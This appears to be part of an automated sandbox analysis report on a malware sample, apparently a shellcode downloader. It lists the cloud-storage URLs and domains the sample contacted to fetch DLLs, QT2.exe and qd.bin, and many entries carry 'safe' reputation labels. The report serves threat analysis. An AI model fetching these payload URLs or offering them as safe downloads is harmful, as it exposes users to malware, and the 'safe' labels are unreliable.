https://wwwdll-1323570959.cos.a	0%	Avira URL Cloud	safe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/Tp	0%	Avira URL Cloud	safe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/j	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllFM	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tp	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tq	0%	Avira URL Cloud	safe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin	0%	Avira URL Cloud	safe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/	0%	Avira URL Cloud	safe
http://www.ijg.org	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dllo	0%	Avira URL Cloud	safe
http://cacerts.di	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlld	0%	Avira URL Cloud	safe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/j	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dll	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dlld	0%	Avira URL Cloud	safe
https://res.ldmnq.com/ld/leidianexmnq5mnq9https://res.ldmnq.com/download/release/ldinst9.0.exeldmnq9	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dTCh	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllCom	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dllTCh	0%	Avira URL Cloud	safe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binShellcodeDownloadererrorerrorerror	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll7SH	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dll	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlldTCh	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exe	0%	Avira URL Cloud	safe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/$p	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllTCh	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$p	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$q	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqc	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap	0%	Avira URL Cloud	safe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllZR	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sgp.file.myqcloud.com	43.152.64.193	true	false	unknown
gz.file.myqcloud.com	159.75.57.35	true	false	unknown
www80-1323570959.cos.ap-singapore.myqcloud.com	unknown	unknown	false	unknown
wwwdll-1323570959.cos.ap-singapore.myqcloud.com	unknown	unknown	false	unknown
wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dll	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dll	false	Avira URL Cloud: safe	unknown
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exe	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exeL	LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dllR	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll9RB	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dlluR	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.d	LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dp	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dq	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/4p	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/&#_	LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.0000000000989000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.0000000000989000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldll	LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://HTTP/1.1	QT2[1].exe.0.dr, software.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/dp	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldllTCh	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322734496.0000000000966000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/j	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/dp	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/Tp	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.a	LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllFM	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ijg.org	cximagecrt[1].dll.0.dr, cximagecrt.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dllo	LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/	LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tp	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tq	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.di	LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlld	LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www80-1323570959.cos.ap-singapore.myqcloud.com/	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000097C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/j	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dlld	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://res.ldmnq.com/ld/leidianexmnq5mnq9https://res.ldmnq.com/download/release/ldinst9.0.exeldmnq9	QT2[1].exe.0.dr, software.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.8.dr	false	URL Reputation: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dllTCh	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dTCh	LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllCom	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binShellcodeDownloadererrorerrorerror	LisectAVT_2403002B_78.exe	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlldTCh	LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/tq	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll7SH	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/$p	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllTCh	LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$p	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$q	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap-singapore.myqc	LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwwdll-1323570959.cos.ap	LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
